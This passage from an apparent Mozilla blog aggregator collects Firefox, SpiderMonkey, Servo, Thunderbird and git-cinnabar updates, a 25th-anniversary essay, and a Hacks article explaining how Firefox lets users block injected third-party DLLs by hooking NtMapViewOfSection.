  • As part of the separation, please use // prettier-ignore to disable formatting, rather than an ESLint directive (e.g. // eslint-disable prettier/prettier). See firefox-dev post here for more information.
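As a quick illustration (my own example, not taken from the firefox-dev post) of the preferred directive, `// prettier-ignore` skips formatting for the statement that follows it, so hand-aligned data survives a formatting pass:

```javascript
// Prettier would normally put this short flat array on a single line;
// the directive preserves the deliberate 3x3 layout.
// prettier-ignore
const matrix = [
  1, 0, 0,
  0, 1, 0,
  0, 0, 1,
];

// The contents are unchanged either way; only the layout is protected.
console.log(matrix.reduce((a, b) => a + b, 0)); // 3
```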

Migration Improvements (CalState LA Project)

Password Manager

PDFs & Printing

Picture-in-Picture

  • Full controls have been enabled by default for beta and stable starting 113 (bug). [Image: Picture-in-Picture video controls, including a video scrubber, seek forward and backward buttons, and a fullscreen toggle.]
  • Thanks so much to the following Outreachy applicants for their contributions to PiP:
  • niklas resolved Hulu subtitles and seeking problems
  • bnasar added a new Yahoo wrapper for Yahoo Finance and AOL to support PiP captions
  • bnasar modified the toggle position for reddit videos to reduce overlap with video controls and restored previously removed toggle policy CSS changes
  • You may have noticed that the regular PiP toggle design changed recently!

Search and Navigation

Search updates
  • Standard8 fixed a bug where search suggestions were sometimes not being fetched because focus was getting stuck on a search field within the page
  • Mandy wrote some new high-level in-tree documentation about the Search Service. Check it out here
  • Standard8 fixed an intermittent failure in one of the search telemetry tests
  • Standard8 reviewed the uses of the search_form field that’s been part of the search engine interfaces for a long time. (A search_form is the homepage for a search engine, google.com for example.) He then landed a patch that removed unnecessary parameters sent to search form URLs
  • Abhishek, a community contributor, landed a patch that improves our handling of OpenSearch engine update URLs
  • Standard8 did a bit of clean up to the Search Service code by removing some code related to an old experiment
  • James added telemetry about how often users see search terms persisted in the URL bar and how often the search term has to be reverted due to a PopupNotification being shown
  • James also fixed a bug so that we now hide the persist search term tip when a PopupNotification is visible
  • James implemented an impression event for ad carousels as part of our ongoing experiments with Glean in SERP telemetry
Urlbar updates
  • Dao landed a patch that adds telemetry to the URL bar’s results menu
  • Dao also landed a patch so that the URL bar results menu for Firefox Suggest and Sponsored Suggest can be enabled separately
  • Daisuke fixed 8 bugs related to the URL bar event telemetry (1817206, 1817208, 1820081, 1820327, 1820453, 1821660, 1822210, 1822319)
  • James landed a patch so that now the site permissions, site identity and tracking protection icons are shown when we persist the search term in the URL bar
  • Standard8 fixed an issue in the Search Service where we were checking every 6 hours for OpenSearch engine updates. Now a timer is only registered for OpenSearch engines that have updates available, and the timer only checks once per day, not every 6 hours.
  • adw added telemetry related to URL bar navigational suggestions
  • adw fixed 2 bugs related to users seeing old weather results after their computer had been asleep or offline (1822918, 1823080)
  • Daisuke fixed a 13-year-old bug (assigned a whopping 13 points in Bugzilla) where opening a link where the target attribute is set to _blank would show about:blank in the address bar until the page loaded (610357)
  • adw fixed an issue with displaying high and low temperatures in the weather results that can appear in the address bar
  • Dao fixed an issue where the address bar results menu dismiss option wasn’t working for top picks and Firefox Suggest results
  • adw fixed an issue where users on a VPN were seeing weather suggestions for the VPN’s endpoint rather than their physical location. Now we no longer fetch weather suggestions when a VPN is active and re-fetch once the user disconnects from the VPN
  • adw also fixed a bug related to address bar engagement event telemetry
  • adw landed a patch that removes certain legacy telemetry non sponsored scalars for weather suggestions

Storybook / Reusable components

 

Firefox NightlyDropping the Banner Hammer and More – These Weeks in Firefox: Issue 134

Highlights

  • Cookie Banner Handling can now be enabled in Nightly via about:preferences#privacy. This will enable the feature for both normal and private browsing.
    • For more granular control you can use the cookiebanners.service.mode and cookiebanners.service.mode.privateBrowsing prefs. Supported modes are:
      • 0: Disabled
      • 1: Reject all (this is what the checkbox in the preferences enables)
      • 2: Reject all or fall back to accept all
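For anyone scripting this setup, the prefs above translate directly into a user.js fragment (a sketch; the pref names and mode values are exactly the ones listed above):

```js
// 1 = reject all cookie banners (what the checkbox in
// about:preferences#privacy enables); 2 falls back to accepting
// when rejection isn't possible; 0 disables the feature.
user_pref("cookiebanners.service.mode", 1);
// The private-browsing mode can be controlled separately.
user_pref("cookiebanners.service.mode.privateBrowsing", 1);
```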
  • The Performance Team has reported some recent wins on the Speedometer benchmark on Windows. [Chart: Speedometer score over time on Windows; higher is better.]
    • The two big jumps are from these two fixes. Great job, Performance Team!
  • Starting from Firefox 112, users can now search for text inside the about:addons page (through the usual associated keyboard shortcuts, e.g. Ctrl-F and ‘/’) – Bug 1499500
  • Hubert added a search modifier to project search in the debugger (bug)

Friends of the Firefox team

Introductions/Shout-Outs

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • CanadaHonk [:canadahonk]
  • Itiel
  • Mathew Hodson
  • steven w

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • Thanks to Itiel, the default extension icons in the extensions button panel are now filled with the current theme color – Bug 1817865
  • In Nightly 112 we migrated the kvstore path used by ExtensionPermissions, to be sure that the kvstore path isn’t shared with the one used internally by ExtensionScriptingStore – Bug 1807010
    • NOTE: the underlying race issue was investigated and confirmed as part of Bug 1805427. Be aware that, despite what the inline comment for nsIKeyValueService.getOrCreate in nsIKeyValue.idl states (that it can be used for multiple database names stored in the same kvstore path), that isn’t thread safe with SafeMode (and the old LMDB mode is deprecated).
WebExtension APIs
  • Starting from Firefox 112, downloads.removeFile API calls that fail will log more detailed info about the actual underlying issue in the browser console – Bug 1807815

Developer Tools

DevTools
  • External contributors:
    • khadija fixed a visual issue in the netmonitor (bug)
    • marlene replaced a wrong parameter value in calls to a CodeMirror method in the debugger (bug)
  • Contributions from other teams:
    • bradwerth improved performance of the grid highlighter when there are a lot of columns in the grid (bug)
    • Emilio fixed a scaling issue in the inspector tooltip (bug)
  • Hubert fixed an issue with Navigator.sendBeacon requests that were shown as Blocked in the Netmonitor even though they went through (bug)
  • Julian fixed a regression that broke network throttling in the Netmonitor (bug)
  • Nicolas removed duplicated ChromeWorker messages in Browser Console (bug)
  • Nicolas improved performance of pretty printing in debugger (bug, bug)
  • Alex made it possible to copy text from Netmonitor HTML preview again (bug)
  • Alex landed a patch that does some groundwork (bug) for a new feature in the debugger that will let the user override HTTP responses with a local file (bug), which is in progress.
WebDriver BiDi
  • Sasha added the browsingContext.print command, which produces a base64-encoded PDF representation of the document (bug)
  • Henrik fixed an issue where TabSession.executeInChild would hang the message manager (bug)
  • Henrik vendored the latest version of puppeteer (19.7.2), which allows more tests to run in CI and gives better coverage of CDP (bug)
  • Henrik also fixed an issue where the httpd.js listener wouldn’t stop, which could lead to unexpected side effects (bug)
  • Julian created a shared module to generate HAR files from WebDriver BiDi network events, which could be useful for libraries that are using BiDi like Browsertime and Selenium (bug)
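As a rough sketch of what a browsingContext.print exchange looks like on the wire (field names follow the general WebDriver BiDi command shape; the context id and the response payload here are made up for illustration, and the session plumbing is elided):

```javascript
// A WebDriver BiDi message is JSON with an id, a method, and params.
const command = {
  id: 1,
  method: "browsingContext.print",
  params: {
    context: "some-context-id", // hypothetical browsing context id
    orientation: "landscape",   // per the orientation parameter above
    background: true,           // per the background parameter above
  },
};

// The command resolves with a base64-encoded PDF in result.data.
// Fake response for illustration: "JVBERi0=" is base64 for "%PDF-".
const fakeResponse = { id: 1, result: { data: "JVBERi0=" } };
const pdfBytes = Buffer.from(fakeResponse.result.data, "base64");
console.log(pdfBytes.toString("latin1")); // "%PDF-"
```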

ESMification status

Migration Improvements (CalState LA Project)

Performance

Privacy/Security

  • In addition to our initial list of site-specific cookie banner handling rules we are working on global rules that can handle a list of cookie banner libraries / providers on any site.
    • You can already test this in Nightly by enabling the pref cookiebanners.service.enableGlobalRules (beware of potential bugs and performance issues)

Search and Navigation

Storybook / Reusable components

Community

Spidermonkey Development BlogSpiderMonkey Newsletter (Firefox 112-113)

SpiderMonkey is the JavaScript engine used in Mozilla Firefox. This newsletter gives an overview of the JavaScript and WebAssembly work we’ve done as part of the Firefox 112 and 113 Nightly release cycles.

🛠️ Profiler instrumentation

We’re working with the performance team to improve profiler support for JIT code. This work allows us to see JS functions (and JIT optimization data) in profiles from tools such as samply. This makes it much easier for us to find and investigate performance issues in the engine.

  • We fixed some JIT code trampolines to properly maintain frame pointers.
  • We added better frame unwinding information for Windows so external profilers can iterate through JIT frames using frame pointers.
  • We added Windows ETW events for mapping JIT code to method names.
  • We added an optional mode for profiling that adds frame pointers to Baseline IC code.
  • We added an optional mode for profiling that adds entry trampolines for scripts running in the interpreters. This makes it possible to distinguish between different scripts that are executing in the interpreter.

🚀 Performance

We’re working on improving performance for popular web frameworks such as React. We can’t list all of these improvements here, but the list below covers some of this work.

  • We optimized global name lookups to use a generation counter instead of shape guards.
  • We added an optimization to guess the size of objects allocated by constructor functions.
  • We rewrote our implementation of Function.prototype.bind to be faster, simpler and use less memory.
  • We implemented monomorphic function inlining for cases where we can skip the trial inlining phase.
  • We added inlining of megamorphic cache lookups to Baseline ICs in addition to Ion.
  • We made our ArraySpeciesLookup cache more robust.
  • We made some improvements to the GC’s parallel marking implementation.
  • We changed our self-hosted builtins to use specialized intrinsics instead of arguments, to eliminate unnecessary arguments object allocations in the interpreter and Baseline tiers.
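The Function.prototype.bind rewrite mentioned above targets a very common pattern; as a plain-JS refresher (nothing here is SpiderMonkey-specific), bound functions fix `this` and any leading arguments:

```javascript
function greet(greeting, name) {
  return `${greeting}, ${name}!`;
}

// bind creates a new function with `this` (here: null) and the first
// argument pre-filled; the engine work makes creating and calling
// such bound functions cheaper.
const greetHello = greet.bind(null, "Hello");

console.log(greetHello("World")); // "Hello, World!"
```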

⚡ Wasm GC

High-level programming languages currently need to bring their own GC if they want to run on WebAssembly. This can result in memory leaks, because such a GC cannot collect cycles that form with the browser's own heap. The Wasm GC proposal adds struct and array types to Wasm so these languages can use the browser’s GC instead.

  • We profiled the dart-barista benchmark and fixed various performance issues.
  • We optimized allocation and GC support for Wasm GC objects.
  • We improved the memory layout of Wasm GC objects to be more efficient.

⚙️ Modernizing JS modules

We’re working on improving our implementation of modules. This includes supporting modules in Workers, adding support for Import Maps, and ESMification (replacing the JSM module system for Firefox internal JS code with standard ECMAScript modules).

  • See the AreWeESMifiedYet website for the status of ESMification. As of this week, almost 70% of modules have been ESMified 🎉
  • We’ve finished most of the work for worker modules. We’re hoping to ship this soon.

📚 Miscellaneous

The Servo BlogLayout 2013 and Layout 2020

Servo currently has two independent layout engines, known as Layout 2013 and Layout 2020, which are named after when they began development. Layout 2020 was designed to fix several shortcomings in Layout 2013, but it’s not yet enabled by default, and this raises the question: which layout engine should Servo use going forward?

To answer this question, we analysed the two layout engines and found differences in:

  • their approaches to parallelism
  • the ways they manage trees of boxes and fragments
  • their relationships with WebRender
  • the degrees to which their architectures reflect CSS specs
  • the completeness of their implementations of CSS features
  • the difficulty in supporting complex features like floats

For more details, check out our report, but in short, we believe Layout 2020 is the best layout engine for Servo going forward.

To give us more confidence in this choice with some practical experience, we’ve started implementing some smaller features in Layout 2020, like <iframe>, min/max width and height, sticky positioning, and ‘text-indent’. We will also start building and testing Layout 2020 (as well as Layout 2013) on CI in the near future.

We will continue to maintain Layout 2013 for now, but we hope that completing many of these features, plus some more complex ones like counters and vertical writing modes, will give us the experience we need to decide whether we want to commit to Layout 2020 and remove Layout 2013 from the tree.

We would love to have you with us on this journey, and we hope that after this transition period, together we can tackle the most challenging parts of Servo’s CSS2 story, like floats and incremental layout!

Mozilla ThunderbirdThese Top 20 Thunderbird Feature Requests Need Your Vote

[Image: lightbulb icon alongside text that says “Top 20 Thunderbird Ideas.”]

At Thunderbird, we enthusiastically embrace open development. That means more than making our software open-source. It also means being as transparent as possible, and communicating frequently with our global family of users. 

We want that communication to go both ways! Which is why Mozilla Connect is such an important tool for telling us the features you want to see get developed for Thunderbird (and soon, for our entire family of products and services). Mozilla Connect is an easy-to-use community tool that can help shape future Thunderbird (and Firefox) releases. It allows you to post a feature request, contribute your opinions to existing ones, and give kudos to the features you believe in.

We’re actively monitoring your Thunderbird feature suggestions at Mozilla Connect, but “voting up” ideas from the community is crucial. There are currently 287 Thunderbird ideas at Connect, many of which need wider discussion and votes.

With that in mind, we collected the Top 20 feature requests and linked them below. Check them out, and please consider lending your voice and your votes to these ideas – and the other 267 – if you believe in them.

Top 20 Thunderbird Feature Ideas At Mozilla Connect

  1. Android version of Thunderbird (in progress!)
  2. Color for Thunderbird accounts
  3. Better Gnome Desktop Integration
  4. Expand relay to create full mozmail E-mail
  5. Firefox Translations in Thunderbird (see Firefox Translations call)
  6. Integrate Google Chat with Mozilla Thunderbird
  7. Thunderbird Labels colors – change background color instead of text color
  8. Make telephone numbers clickable in Thunderbird Address book
  9. Thunderbird: Group by date
  10. Migrate and cleanup Thunderbird profile
  11. Make delayed/planned sending of emails possible
  12. Add the option to sort conversations with last post first
  13. RSS feature in Thunderbird adds Pocket button
  14. Option to disable opening PDF directly in Thunderbird
  15. Thunderbird should by default have all telemetry as an opt-in option
  16. Bring back support for accent insensitive message search filter
  17. Include a QR code Decoder into Thunderbird
  18. Thunderbird Web, I’d pay a sub fee for it
  19. Delete a mail directly from notification
  20. An Option to Resend a Message Again

There are some undeniably smart and useful suggestions here. We look forward to seeing your feedback at Mozilla Connect.

Last but not least, we absolutely encourage you to submit your own ideas! Just be sure to use #Thunderbird in the body of the message.

The post These Top 20 Thunderbird Feature Requests Need Your Vote appeared first on The Thunderbird Blog.

Mozilla Open Policy & Advocacy BlogMozilla Meetups with CDT: Talking Tech Transparency

Join Mozilla and the Center for Democracy & Technology (CDT) for a conversation about Congress’ work on tech transparency. The event will feature keynote remarks from U.S. Congresswoman Lori Trahan followed by an expert panel discussion.

The panel and remarks will be immediately followed by a happy hour reception where drinks and light fare will be served.

Date and time: Wednesday, April 26th – event starts @ 4:00PM promptly (doors @ 3:45pm)
Location: Jackie, 79 Potomac Ave SE, Washington, DC 20003

Registration is closed.

The post Mozilla Meetups with CDT: Talking Tech Transparency appeared first on Open Policy & Advocacy.

Mozilla ThunderbirdThunderbird for Android / K-9 Mail: March Progress Report


Last month we reported on our progress in turning K-9 Mail into Thunderbird for Android. Since then a month has passed, so it’s time for another detailed update.

(If you missed the exciting news last summer, K-9 Mail is now part of the Thunderbird family, and we’re working steadily on transforming it into Thunderbird for Android. If you want to learn more, check out our Android roadmap, this blog post, and this FAQ.)

Towards a new stable release

The goal for March was to get the app into shape for a new stable release. We didn’t quite get there, but we should be close now.

✨ Polishing the user interface

In February we introduced changes to the message view and message list screens. In March we spent quite some time polishing the UI and fixing bugs in that newly added code.

📃 Message list

After experimenting with displaying the colored account indicator to the left of the subject/sender text, we decided to move it back to where it was in K-9 Mail 6.400.

[Image: K-9 Mail 6.509, colored account indicator to the left of the text]
[Image: K-9 Mail 6.511, colored account indicator in line with text]

We updated the “snackbar” that is displayed after the app is updated so that it disappears automatically after 10 seconds.

[Image: K-9 Mail 6.511, “Find out what’s new in this release” notice]

A keen observer will notice that we also changed the appearance of the floating button used to compose a new message. It now only shows an icon and the button is hidden when the message list is scrolled down.

📥 Message view

In a previous beta version we accidentally increased the size of the star in the message view. We fixed that, and also reduced the size of the account “chip”.

[Image: K-9 Mail 6.509, large account indicator and message star]

We also added a setting to specify the font size of the account name under Settings → General settings → Display → Font size → Account name.

🪲 Bug fixes

Thanks to our beta testers we were able to track down and fix a couple of bugs:

  • Toolbar icons in the message view screen were missing when the app was killed while in the background and restored afterwards.
  • When the message list was updated while the user was swiping between messages, the swipe action was canceled, and the previously displayed message was displayed again.
  • The layout of the message details screen wasn’t adjusted when contact pictures were disabled, leading to contact picture sized gaps in the layout.
  • A couple of other minor bugs.

📃 User Manual & Updating Screenshots

Did you know that K-9 Mail has a user manual? It can be found under docs.k9mail.app.

We updated the site to support multiple app versions and languages. For now, though, the user manual is only available in English.

In preparation for a new stable version, we added a “6.5xx (beta)” version and started updating the screenshots throughout the user manual. It turns out there’s quite a lot of them, and basically all of the screenshots need to be updated because the appearance of the app has changed since the last stable version. This is tedious work and has to be done every time we make visual changes that affect the whole app. So we started automating this task 🤖

Design system

Over the years, the visual appearance of Android has changed quite a lot, and so has the appearance of K-9 Mail. However, due to lack of resources, we never managed to update the whole app at once. And so the app still is a mix of different visual styles.

To improve this situation, we started working on implementing a design system – reusable components that can be assembled to build the different screens of the app. We’ll use it for new screens added to the app and will slowly migrate existing screens to using the design system.

Hopefully, this will allow us to react faster to design changes in Android in the future. For now, we’re still playing catch-up.

Releases

In March 2023 we published the following beta versions:

On behalf of the entire team, thanks very much for using K-9 Mail. We can’t wait to put Thunderbird for Android in your hands later this summer!

The post Thunderbird for Android / K-9 Mail: March Progress Report appeared first on The Thunderbird Blog.

The Talospace ProjectFirefox 111 on POWER

This got a bit delayed due to $DAYJOB interfering with my important hacking and writing time (darn having to make a living), but Firefox 111 is out. As usual you'll need to deal with bug 1775202 either with this patch — but without the line containing desktop_capture/desktop_capture_gn, since that's been gone since the latest WebRTC update — or put --disable-webrtc in your .mozconfig if you don't need WebRTC. The workaround adding #pragma GCC diagnostic ignored "-Wnonnull" to js/src/irregexp/imported/regexp-parser.cc for optimized builds fortunately was addressed by bug 1810584, so you no longer need it, and the browser otherwise builds and works with the PGO-LTO patch for Firefox 110 and the .mozconfigs from Firefox 105.
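If you go the no-WebRTC route, the relevant line is standard mozconfig syntax (shown here for convenience; it mirrors the --disable-webrtc option mentioned above):

```sh
# .mozconfig fragment: skip building WebRTC entirely, avoiding the
# need to carry a patch for bug 1775202.
ac_add_options --disable-webrtc
```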

Niko MatsakisFix my blog, please

It’s well known that my blog has some issues. The category links don’t work. It renders oddly on mobile. And maybe Safari, too? The Rust snippets are not colored. The RSS feed is apparently not advertised properly in the metadata. It’s published via a makefile instead of some hot-rod CI/CD script, and it uses jekyll instead of whatever the new hotness is.1 Being a programmer, you’d think I could fix this, but I am intimidated by HTML, CSS, and Github Actions. Hence this call for help: I’d like to hire someone to “tune up” the blog, a combination of fixing the underlying setup and also the visual layout. This post will be a rough set of things I have in mind, but I’m open to suggestions. If you think you’d be up for the job, read on.

Desiderata2

In short, I am looking for a rad visual designer who also can do the technical side of fixing up my jekyll and CI/CD setup.

Specific work items I have in mind:

  • Syntax highlighting
  • Make it look great on mobile and safari
  • Fix the category links
  • Add RSS feed into metadata and link it, whatever is normal
  • CI/CD setup so that when I push or land a PR, it deploys automatically
  • “Tune up” the layout, but keep the cute picture!3

Bonus points if you can make the setup easier to duplicate. Installing and upgrading Ruby is a horrible pain and I always forget whether I like rbenv or rubyenv or whatever better. Porting over to Hugo or Zola would likely be awesome, so long as links and content can be preserved. I do use some funky jekyll plugins, though I kind of forgot why. Alternatively maybe something with docker?

Current blog implementation

The blog is a jekyll blog with a custom theme. Sources are here:

  • https://github.com/nikomatsakis/babysteps
  • https://github.com/nikomatsakis/nikomatsakis-babysteps-theme

Deployment is done via rsync at present.

Interested?

Send me an email with your name, some examples of past work, any recommendations etc, and the rate you charge. Thanks!

  1. On the other hand, it has that super cute picture of my daughter (from around a decade ago, but still…). And the content, I like to think, is decent. 

  2. I have a soft spot for wacky plurals, and “desiderata” might be my fave. I heard it first from a Dave Herman presentation to TC39 and it’s been rattling in my brain ever since, wanting to be used. 

  3. Ooooh, I always want nice looking tables like those wizards who style github have. How come my tables are always so ugly? 

Mike HommeyAnnouncing git-cinnabar 0.6.0

Git-cinnabar is a git remote helper to interact with mercurial repositories. It lets you clone, pull, and push from/to mercurial remote repositories using git.

Get it on github.

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.5.11?

  • Full rewrite of the Python parts of git-cinnabar in Rust.
  • Push performance is between twice and 10 times faster than 0.5.x, depending on scenarios.
  • Based on git 2.38.0.
  • git cinnabar fetch now accepts a --tags flag to fetch tags.
  • git cinnabar bundle now accepts a -t flag to give a specific bundlespec.
  • git cinnabar rollback now accepts a --candidates flag to list the metadata sha1 that can be used as target of the rollback.
  • git cinnabar rollback now also accepts a --force flag to allow any commit sha1 as metadata.
  • git cinnabar now has a self-update subcommand that upgrades it when a new version is available. The subcommand is only available when building with the self-update feature (enabled on prebuilt versions of git-cinnabar).
  • Disabled inexact copy/rename detection, which had been enabled by accident.

What’s new since 0.6.0rc2?

  • Fixed use-after-free in metadata initialization.
  • Look for the new location of the CA bundle in git-windows 2.40.

Mitchell BakerA Quarter Century of Mozilla

March 31, or “three thirty-one,” is something of a talisman in the Mozilla community. It’s the date that, back in 1998, Mozilla first came into being — the date that we open-sourced the Netscape code for the world to use.

This year, “three thirty-one” is especially meaningful: It’s Mozilla’s 25 year anniversary.

A lot has changed since 1998. Mozilla is no longer just a bold idea. We’re a family of organizations — a nonprofit, a public benefit-corporation, and others — that builds products, fuels movements, and invests in responsible tech.

And we’re no longer a small group of engineers in Netscape’s Mountain View office. We’re technologists, researchers, and activists located around the globe — not to mention tens of thousands of volunteers.

But if a Mozillian from 1998 stepped into a Mozilla office (or joined a Mozilla video call) in 2023, I think they’d quickly feel something recognizable. A familiar spirit, and a familiar set of values.

When Mozilla open-sourced our browser code 25 years ago, the reason was the public interest: We wanted to spark more innovation, more competition, and more choice online. Technology in the public interest has been our manifesto ever since — whether releasing Firefox 1.0 in 2004, or launching Mozilla.ai earlier this year.

Right now, technology in the public interest seems more important than ever before. The internet today is deeply entwined with our personal lives, our professional lives, and society at large. The internet today is also flawed. Centralized control reduces choice and competition. A focus on “engagement” magnifies outrage, and bad actors are thriving.

Right now — and over the next 25 years — Mozilla can do something about this.

Mozilla’s mission and principles are evergreen, and we will continue to evolve to meet the needs and challenges of the modern internet. How people use the internet will change over time, but the need for innovative products that give individuals agency and choice on the internet is a constant. Firefox has evolved from a faithful and efficient renderer of web pages on PCs to a cross-platform agent that acts on behalf of the individual, protecting them from bad actors and surveillance capitalists as they navigate the web. Mozilla has introduced new products, such as Firefox Relay and Mozilla VPN, to keep people’s identity protected and activity private as they use the internet. Mozilla is contributing to healthy public discourse, with Pocket enabling discovery of amazing content and the mozilla.social Mastodon instance supporting decentralized, community-driven social media.

We’re constantly exploring ways to apply new technologies so that people feel the benefits in their everyday lives, as well as inspire others to responsibly innovate on behalf of humanity. As AI emerges as a core building block for the future of computing, we’ll turn our attention in that direction and ask: How can we make products and technologies like machine learning work in the public interest? We’ve already started this work via Mozilla.ai, a new Mozilla organization focusing on a trustworthy, independent, and open-source AI ecosystem. And via the Responsible AI Challenge, where we’re convening (and funding) bright people and ambitious projects building trustworthy AI.

And we will continue to champion public policy that keeps the internet healthy. There is proposed legislation around the world that seeks to maintain the internet in the public interest: the Platform Accountability and Transparency Act (PATA) in the U.S., the Digital Services Act (DSA) in the EU. Mozilla has helped shape these laws, and we will continue to follow along closely with their implementation and enforcement.

On this “three thirty-one,” I’m realistic about the challenges facing the internet. But I’m also optimistic about Mozilla’s potential to address them. And I’m looking forward to another 25 years of not just product, but also advocacy, philanthropy, and policy in service of a better internet.

Hacks.Mozilla.OrgLetting users block injected third-party DLLs in Firefox

In Firefox 110, users now have the ability to control which third-party DLLs are allowed to load into Firefox processes.

Let’s talk about what this means and when it might be useful.

What is third-party DLL injection?

On Windows, third-party products have a variety of ways to inject their code into other running processes. This is done for a number of reasons; the most common is for antivirus software, but other uses include hardware drivers, screen readers, banking (in some countries) and, unfortunately, malware.

Having a DLL from a third-party product injected into a Firefox process is surprisingly common – according to our telemetry, over 70% of users on Windows have at least one such DLL! (to be clear, this means any DLL not digitally signed by Mozilla or part of the OS).

Most users are unaware when DLLs are injected into Firefox, as most of the time there’s no obvious indication this is happening, other than checking the about:third-party page.

Unfortunately, having DLLs injected into Firefox can lead to performance, security, or stability problems. This is for a number of reasons:

  • DLLs will often hook into internal Firefox functions, which are subject to change from release to release. We make no special effort to maintain the behavior of internal functions (of which there are thousands), so the publisher of the third-party product has to be diligent about testing with new versions of Firefox to avoid stability problems.
  • Firefox, being a web browser, loads and runs code from untrusted and potentially hostile websites. Knowing this, we go to a lot of effort to keep Firefox secure; see, for example, the Site Isolation Security Architecture and Improved Process Isolation. Third-party products may not have the same focus on security.
  • We run an extensive number of tests on Firefox, and third-party products may not test to that extent since they’re probably not designed to work specifically with Firefox.

Indeed, our data shows that just over 2% of all Firefox crash reports on Windows are in third-party code. This is despite the fact that Firefox already blocks a number of specific third-party DLLs that are known to cause a crash (see below for details).

This also undercounts crashes that are caused indirectly by third-party DLLs, since our metrics only look for third-party DLLs directly in the call stack. Additionally, third-party DLLs are a bit more likely to cause crashes at startup, which are much more serious for users.

Firefox has a third-party injection policy, and whenever possible we recommend third parties instead use extensions to integrate into Firefox, as this is officially supported and much more stable.

Why not block all DLL injection by default?

For maximum stability and performance, Firefox could try to block all third-party DLLs from being injected into its processes. However, this would break some useful products like screen readers that users want to be able to use with Firefox. This would also be technically challenging and it would probably be impossible to block every third-party DLL, especially third-party products that run with higher privilege than Firefox.

Since 2010, Mozilla has had the ability to block specific third-party DLLs for all Windows users of Firefox. We do this only as a last resort, after trying to communicate with the vendor to get the underlying issue fixed, and we tailor it as tightly as we can to make Firefox users stop crashing. (We have the ability to only block specific versions of the DLL and only in specific Firefox processes where it’s causing problems). This is a helpful tool, but we only consider using it if a particular third-party DLL is causing lots of crashes such that it shows up on our list of top crashes in Firefox.

Even if we know a third-party DLL can cause a crash in Firefox, there are times when the functionality that the DLL provides is essential to the user, and the user would not want us to block the DLL on their behalf. If the user’s bank or government requires some software to access their accounts or file their taxes, we wouldn’t be doing them any favors by blocking it, even if blocking it would make Firefox more stable.

Giving users the power to block injected DLLs

With Firefox 110, users can block third-party DLLs from being loaded into Firefox. This can be done on the about:third-party page, which already lists all loaded third-party modules. The about:third-party page also shows which third-party DLLs have been involved in previous Firefox crashes; along with the name of the publisher of the DLL, hopefully this will let users make an informed decision about whether or not to block a DLL. Here’s an example of a DLL that recently crashed Firefox; clicking the button with a dash on it will block it:

Screenshot of the about:third-party page showing a module named "CrashingInjectibleDll.dll" with a yellow triangle indicating it has recently caused a crash, and a button with a dash on it that can be used to block it from loading into Firefox.

Here’s what it looks like after blocking the DLL and restarting Firefox:

 Screenshot of the about:third-party page showing a module named "CrashingInjectibleDll.dll" with a yellow triangle indicating it has recently caused a crash, and a red button with an X on it indicating that it is blocked from loading into Firefox.

If blocking a DLL causes a problem, launching Firefox in Troubleshoot Mode will disable all third-party DLL blocking for that run of Firefox, and DLLs can be blocked or unblocked on the about:third-party page as usual.

How it works

Blocking DLLs from loading into a process is tricky business. In order to detect all DLLs loading into a Firefox process, the blocklist has to be set up very early during startup. For this purpose, we have the launcher process, which creates the main browser process in a suspended state. Then it sets up any sandboxing policies, loads the blocklist file from disk, and copies the entries into the browser process before starting that process.

The copying is done in an interesting way: the launcher process creates an OS-backed file mapping object with CreateFileMapping(), and, after populating that with blocklist entries, duplicates the handle and uses WriteProcessMemory() to write that handle value into the browser process. Ironically, WriteProcessMemory() is often used as a way for third-party DLLs to inject themselves into other processes; here we’re using it to set a variable at a known location, since the launcher process and the browser process are run from the same .exe file!

Because everything happens so early during startup, well before the Firefox profile is loaded, the list of blocked DLLs is stored per Windows user instead of per Firefox profile. Specifically, the file is in %AppData%\Mozilla\Firefox, and the filename has the format blocklist-{install hash}, where the install hash is a hash of the location on disk of Firefox. This is an easy way of keeping the blocklist separate for different Firefox installations.
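To make the naming scheme concrete, here is a small hypothetical Rust sketch of deriving a per-installation blocklist filename from the install path. Note that Firefox's actual install-hash algorithm is not specified in this post; `DefaultHasher` stands in here purely to illustrate the idea of a stable hash keyed by install location.

```rust
use std::collections::hash_map::DefaultHasher;
use std::hash::{Hash, Hasher};

/// Hypothetical sketch: derive a blocklist filename of the form
/// `blocklist-{install hash}` from the Firefox install directory.
/// The real algorithm used by Firefox may differ.
fn blocklist_filename(install_dir: &str) -> String {
    let mut h = DefaultHasher::new();
    install_dir.hash(&mut h);
    format!("blocklist-{:016X}", h.finish())
}

fn main() {
    let a = blocklist_filename(r"C:\Program Files\Mozilla Firefox");
    let b = blocklist_filename(r"C:\Program Files\Mozilla Firefox");
    // Same install location always yields the same filename.
    assert_eq!(a, b);
    assert!(a.starts_with("blocklist-"));
}
```

The key property is determinism: two Firefox installations at different paths get separate blocklist files, while the same installation always finds its own.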

Detecting and blocking DLLs from loading

To detect when a DLL is trying to load, Firefox uses a technique known as function interception or hooking. This modifies an existing function in memory so another function can be called before the existing function begins to execute. This can be useful for many reasons; it allows changing the function’s behavior even if the function wasn’t designed to allow changes. Microsoft Detours is a tool commonly used to intercept functions.

In Firefox’s case, the function we’re interested in is NtMapViewOfSection(), which gets called whenever a DLL loads. The goal is to get notified when this happens so we can check the blocklist and forbid a DLL from loading if it’s on the blocklist.

To do this, Firefox uses a homegrown function interceptor to intercept calls to NtMapViewOfSection() and return that the mapping failed if the DLL is on the blocklist. To do this, the interceptor tries two different techniques:

  • On the 32-bit x86 platform, some functions exported from a DLL will begin with a two-byte instruction that does nothing (mov edi, edi) and have five one-byte unused instructions before that (either nop or int 3). For example:
                  nop
                  nop
                  nop
                  nop
                  nop
    DLLFunction:  mov edi, edi
                  (actual function code starts here)
    

    If the interceptor detects that this is the case, it can replace the five bytes of unused instructions with a jmp to the address of the function to call instead (since we’re on a 32-bit platform, we just need one byte to indicate a jump and four bytes for the address). So this would look like:

                 jmp <address of Firefox patched function>
    DLLFunction: jmp $-5 # encodes in two bytes: EB F9
                 (actual function code starts here)
    

    When the patched function wants to call the unpatched version of DLLFunction(), it simply jumps 2 bytes past the address of DLLFunction() to start the actual function code.

